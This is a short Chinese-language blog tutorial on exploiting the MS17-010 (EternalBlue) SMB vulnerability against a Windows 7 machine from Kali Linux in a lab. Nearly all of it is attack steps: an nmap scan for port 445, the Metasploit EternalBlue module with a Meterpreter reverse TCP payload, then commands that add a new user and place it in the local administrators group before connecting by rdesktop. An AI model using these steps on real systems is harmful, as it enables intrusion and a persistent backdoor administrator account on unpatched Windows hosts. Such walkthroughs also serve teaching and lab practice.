您现在的位置:首页 > >

利用ms17-010漏洞提权

发布时间:

一、打开kali和win7查看IP。
(1) Windows7作为靶机
IP:192.168.43.109
(2) Kali作为攻击机(最新版kaili)
IP:192.168.43.49
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。

三、在kali中输入 msfconsole(等待一会可能会有点慢)
四、进入后输人search ms17-010(搜素攻击模块)

五、找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue




使用show options 或者options查看选项设置
可以使用show targets来查看可以攻击的系统版本
使用show payloads可以加载所有可以使用的攻击向量




六、输入show options 查看和配置RHOST(靶机)和LHOST(操作机)

七、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp


八、run或exploit进行攻击

九、进如目标机终端

十、可以创建用户 net user xxxx 1234 /add(xxxx用户名 1234密码)
十一、net localgroup administrators xxxx /add (将用户设置为管理员权限)

十二、重新打开一个终端 rdesktop+IP



热文推荐
猜你喜欢
友情链接: